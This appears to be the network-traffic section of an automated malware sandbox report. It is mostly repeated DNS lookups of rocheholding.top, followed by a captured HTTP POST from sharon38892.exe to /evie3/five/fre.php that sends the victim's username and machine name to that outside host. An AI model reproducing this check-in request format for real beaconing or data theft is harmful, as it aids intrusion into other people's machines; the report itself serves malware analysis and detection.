May 23, 2024 20:17:50.051635981 CEST	8.8.8.8	192.168.2.22	0x9e5b	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:50.937587023 CEST	8.8.8.8	192.168.2.22	0x7e82	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:50.937587023 CEST	8.8.8.8	192.168.2.22	0x7e82	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:51.796273947 CEST	8.8.8.8	192.168.2.22	0x55d9	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:51.796273947 CEST	8.8.8.8	192.168.2.22	0x55d9	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:52.687720060 CEST	8.8.8.8	192.168.2.22	0x462b	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:52.687720060 CEST	8.8.8.8	192.168.2.22	0x462b	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:53.967643023 CEST	8.8.8.8	192.168.2.22	0xde7c	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:53.967643023 CEST	8.8.8.8	192.168.2.22	0xde7c	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:56.039443970 CEST	8.8.8.8	192.168.2.22	0xd483	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:56.039443970 CEST	8.8.8.8	192.168.2.22	0xd483	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:56.970849037 CEST	8.8.8.8	192.168.2.22	0x6a2a	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:56.970849037 CEST	8.8.8.8	192.168.2.22	0x6a2a	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:57.912106991 CEST	8.8.8.8	192.168.2.22	0xf66b	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:57.912106991 CEST	8.8.8.8	192.168.2.22	0xf66b	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:58.813364029 CEST	8.8.8.8	192.168.2.22	0x45d7	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:58.813364029 CEST	8.8.8.8	192.168.2.22	0x45d7	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:59.754622936 CEST	8.8.8.8	192.168.2.22	0xf400	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:59.754622936 CEST	8.8.8.8	192.168.2.22	0xf400	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:00.729857922 CEST	8.8.8.8	192.168.2.22	0x9109	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:00.729857922 CEST	8.8.8.8	192.168.2.22	0x9109	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:01.547060966 CEST	8.8.8.8	192.168.2.22	0x99a5	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:01.547060966 CEST	8.8.8.8	192.168.2.22	0x99a5	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:02.361994028 CEST	8.8.8.8	192.168.2.22	0xc624	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:02.361994028 CEST	8.8.8.8	192.168.2.22	0xc624	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:03.271300077 CEST	8.8.8.8	192.168.2.22	0xc016	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:03.271300077 CEST	8.8.8.8	192.168.2.22	0xc016	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:04.162955999 CEST	8.8.8.8	192.168.2.22	0x8c4d	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:04.162955999 CEST	8.8.8.8	192.168.2.22	0x8c4d	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:06.036633968 CEST	8.8.8.8	192.168.2.22	0xc569	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:06.036633968 CEST	8.8.8.8	192.168.2.22	0xc569	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:07.067257881 CEST	8.8.8.8	192.168.2.22	0xf630	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:07.067257881 CEST	8.8.8.8	192.168.2.22	0xf630	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:07.982644081 CEST	8.8.8.8	192.168.2.22	0xf4b1	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:07.982644081 CEST	8.8.8.8	192.168.2.22	0xf4b1	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:08.941198111 CEST	8.8.8.8	192.168.2.22	0x3521	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:08.941198111 CEST	8.8.8.8	192.168.2.22	0x3521	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:09.852065086 CEST	8.8.8.8	192.168.2.22	0xc56a	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:09.852065086 CEST	8.8.8.8	192.168.2.22	0xc56a	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:10.671595097 CEST	8.8.8.8	192.168.2.22	0x4e05	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:10.671595097 CEST	8.8.8.8	192.168.2.22	0x4e05	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:11.707437992 CEST	8.8.8.8	192.168.2.22	0x2b72	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:11.707437992 CEST	8.8.8.8	192.168.2.22	0x2b72	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:16.263711929 CEST	8.8.8.8	192.168.2.22	0xf18c	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:16.263711929 CEST	8.8.8.8	192.168.2.22	0xf18c	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:17.149425030 CEST	8.8.8.8	192.168.2.22	0xfa0a	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:17.149425030 CEST	8.8.8.8	192.168.2.22	0xfa0a	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:18.070195913 CEST	8.8.8.8	192.168.2.22	0xaa95	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:18.070195913 CEST	8.8.8.8	192.168.2.22	0xaa95	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:18.964488983 CEST	8.8.8.8	192.168.2.22	0xa1cc	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:18.964488983 CEST	8.8.8.8	192.168.2.22	0xa1cc	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:19.979517937 CEST	8.8.8.8	192.168.2.22	0xf561	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:19.979517937 CEST	8.8.8.8	192.168.2.22	0xf561	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:20.875355959 CEST	8.8.8.8	192.168.2.22	0x8de3	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:20.875355959 CEST	8.8.8.8	192.168.2.22	0x8de3	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:21.829258919 CEST	8.8.8.8	192.168.2.22	0xdf91	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:21.829258919 CEST	8.8.8.8	192.168.2.22	0xdf91	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:22.764985085 CEST	8.8.8.8	192.168.2.22	0x2be1	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:22.764985085 CEST	8.8.8.8	192.168.2.22	0x2be1	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:23.666145086 CEST	8.8.8.8	192.168.2.22	0x47e6	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:23.666145086 CEST	8.8.8.8	192.168.2.22	0x47e6	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:24.557745934 CEST	8.8.8.8	192.168.2.22	0x82db	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:24.557745934 CEST	8.8.8.8	192.168.2.22	0x82db	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:25.476716042 CEST	8.8.8.8	192.168.2.22	0x704a	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:25.476716042 CEST	8.8.8.8	192.168.2.22	0x704a	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:26.587213039 CEST	8.8.8.8	192.168.2.22	0x98d5	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:26.587213039 CEST	8.8.8.8	192.168.2.22	0x98d5	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:27.505067110 CEST	8.8.8.8	192.168.2.22	0xcd9f	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:27.505067110 CEST	8.8.8.8	192.168.2.22	0xcd9f	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:28.368410110 CEST	8.8.8.8	192.168.2.22	0xfb0f	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:28.368410110 CEST	8.8.8.8	192.168.2.22	0xfb0f	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:29.286659002 CEST	8.8.8.8	192.168.2.22	0xa5a1	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:29.286659002 CEST	8.8.8.8	192.168.2.22	0xa5a1	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:30.091368914 CEST	8.8.8.8	192.168.2.22	0xc549	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:30.091368914 CEST	8.8.8.8	192.168.2.22	0xc549	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:30.949893951 CEST	8.8.8.8	192.168.2.22	0x3f3d	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:30.949893951 CEST	8.8.8.8	192.168.2.22	0x3f3d	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:31.704309940 CEST	8.8.8.8	192.168.2.22	0xbac9	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:31.704309940 CEST	8.8.8.8	192.168.2.22	0xbac9	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:37.670048952 CEST	8.8.8.8	192.168.2.22	0x82cf	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:37.670048952 CEST	8.8.8.8	192.168.2.22	0x82cf	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:38.552854061 CEST	8.8.8.8	192.168.2.22	0x9000	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:38.552854061 CEST	8.8.8.8	192.168.2.22	0x9000	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:39.374072075 CEST	8.8.8.8	192.168.2.22	0xeeb3	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:39.374072075 CEST	8.8.8.8	192.168.2.22	0xeeb3	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:40.266540051 CEST	8.8.8.8	192.168.2.22	0x9716	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:40.266540051 CEST	8.8.8.8	192.168.2.22	0x9716	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:41.202218056 CEST	8.8.8.8	192.168.2.22	0x683c	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:41.202218056 CEST	8.8.8.8	192.168.2.22	0x683c	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:41.971498966 CEST	8.8.8.8	192.168.2.22	0x4f9c	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:41.971498966 CEST	8.8.8.8	192.168.2.22	0x4f9c	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:42.906310081 CEST	8.8.8.8	192.168.2.22	0x763f	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:42.906310081 CEST	8.8.8.8	192.168.2.22	0x763f	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:43.776977062 CEST	8.8.8.8	192.168.2.22	0xcbb6	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:43.776977062 CEST	8.8.8.8	192.168.2.22	0xcbb6	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:44.719610929 CEST	8.8.8.8	192.168.2.22	0x25c0	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:44.719610929 CEST	8.8.8.8	192.168.2.22	0x25c0	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:45.617742062 CEST	8.8.8.8	192.168.2.22	0x6ef8	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:45.617742062 CEST	8.8.8.8	192.168.2.22	0x6ef8	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:46.510543108 CEST	8.8.8.8	192.168.2.22	0xbb0	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:46.510543108 CEST	8.8.8.8	192.168.2.22	0xbb0	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:47.433036089 CEST	8.8.8.8	192.168.2.22	0xbfd4	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:47.433036089 CEST	8.8.8.8	192.168.2.22	0xbfd4	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:48.350919962 CEST	8.8.8.8	192.168.2.22	0x66e	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:48.350919962 CEST	8.8.8.8	192.168.2.22	0x66e	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:49.158883095 CEST	8.8.8.8	192.168.2.22	0x9279	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:49.158883095 CEST	8.8.8.8	192.168.2.22	0x9279	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:50.054630041 CEST	8.8.8.8	192.168.2.22	0xaf87	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:50.054630041 CEST	8.8.8.8	192.168.2.22	0xaf87	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:51.078370094 CEST	8.8.8.8	192.168.2.22	0x1204	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:51.078370094 CEST	8.8.8.8	192.168.2.22	0x1204	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:52.378161907 CEST	8.8.8.8	192.168.2.22	0x3a9d	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:52.378161907 CEST	8.8.8.8	192.168.2.22	0x3a9d	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:53.335199118 CEST	8.8.8.8	192.168.2.22	0xcde	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:53.335199118 CEST	8.8.8.8	192.168.2.22	0xcde	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:54.304356098 CEST	8.8.8.8	192.168.2.22	0x96c9	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:54.304356098 CEST	8.8.8.8	192.168.2.22	0x96c9	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:55.217312098 CEST	8.8.8.8	192.168.2.22	0x1dcb	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:55.217312098 CEST	8.8.8.8	192.168.2.22	0x1dcb	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:56.082659960 CEST	8.8.8.8	192.168.2.22	0x3b1c	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:56.082659960 CEST	8.8.8.8	192.168.2.22	0x3b1c	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:56.896380901 CEST	8.8.8.8	192.168.2.22	0x1323	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:56.896380901 CEST	8.8.8.8	192.168.2.22	0x1323	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:57.784815073 CEST	8.8.8.8	192.168.2.22	0xd83d	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:57.784815073 CEST	8.8.8.8	192.168.2.22	0xd83d	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:58.585558891 CEST	8.8.8.8	192.168.2.22	0x741d	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:58.585558891 CEST	8.8.8.8	192.168.2.22	0x741d	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:59.513384104 CEST	8.8.8.8	192.168.2.22	0x96d3	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:59.513384104 CEST	8.8.8.8	192.168.2.22	0x96d3	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:00.417927027 CEST	8.8.8.8	192.168.2.22	0x5508	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:00.417927027 CEST	8.8.8.8	192.168.2.22	0x5508	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:01.357151985 CEST	8.8.8.8	192.168.2.22	0x8bb0	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:01.357151985 CEST	8.8.8.8	192.168.2.22	0x8bb0	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:02.176846981 CEST	8.8.8.8	192.168.2.22	0x857f	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:02.176846981 CEST	8.8.8.8	192.168.2.22	0x857f	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:03.309638977 CEST	8.8.8.8	192.168.2.22	0xee35	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:03.309638977 CEST	8.8.8.8	192.168.2.22	0xee35	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:04.219594955 CEST	8.8.8.8	192.168.2.22	0xde3	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:04.219594955 CEST	8.8.8.8	192.168.2.22	0xde3	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:05.125282049 CEST	8.8.8.8	192.168.2.22	0xc242	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:05.125282049 CEST	8.8.8.8	192.168.2.22	0xc242	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:06.057423115 CEST	8.8.8.8	192.168.2.22	0xa5d5	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:06.057423115 CEST	8.8.8.8	192.168.2.22	0xa5d5	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:07.011307001 CEST	8.8.8.8	192.168.2.22	0x955e	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:07.011307001 CEST	8.8.8.8	192.168.2.22	0x955e	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:07.881956100 CEST	8.8.8.8	192.168.2.22	0x3bdc	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:07.881956100 CEST	8.8.8.8	192.168.2.22	0x3bdc	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:08.846313000 CEST	8.8.8.8	192.168.2.22	0x5fde	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:08.846313000 CEST	8.8.8.8	192.168.2.22	0x5fde	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:09.912739038 CEST	8.8.8.8	192.168.2.22	0xa027	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:09.912739038 CEST	8.8.8.8	192.168.2.22	0xa027	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:10.733256102 CEST	8.8.8.8	192.168.2.22	0x6945	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:10.733256102 CEST	8.8.8.8	192.168.2.22	0x6945	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:11.668661118 CEST	8.8.8.8	192.168.2.22	0x1ac5	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:11.668661118 CEST	8.8.8.8	192.168.2.22	0x1ac5	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:12.589925051 CEST	8.8.8.8	192.168.2.22	0x9200	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:12.589925051 CEST	8.8.8.8	192.168.2.22	0x9200	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:13.391798019 CEST	8.8.8.8	192.168.2.22	0xe002	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:13.391798019 CEST	8.8.8.8	192.168.2.22	0xe002	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:14.269871950 CEST	8.8.8.8	192.168.2.22	0xdc3b	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:14.269871950 CEST	8.8.8.8	192.168.2.22	0xdc3b	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:15.177254915 CEST	8.8.8.8	192.168.2.22	0xc8bf	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:15.177254915 CEST	8.8.8.8	192.168.2.22	0xc8bf	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:15.998914003 CEST	8.8.8.8	192.168.2.22	0x1f8e	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:15.998914003 CEST	8.8.8.8	192.168.2.22	0x1f8e	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:16.873891115 CEST	8.8.8.8	192.168.2.22	0x3173	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:16.873891115 CEST	8.8.8.8	192.168.2.22	0x3173	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:17.645247936 CEST	8.8.8.8	192.168.2.22	0x9b3b	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:17.645247936 CEST	8.8.8.8	192.168.2.22	0x9b3b	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:18.432483912 CEST	8.8.8.8	192.168.2.22	0xaa28	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:18.432483912 CEST	8.8.8.8	192.168.2.22	0xaa28	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

universalmovies.top

rocheholding.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49164	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:35.132025003 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 176 Connection: close
May 23, 2024 20:17:35.171624899 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus141700ALBUS-PCk0DE4229FCF97F5879F50F8FD3QDi1K
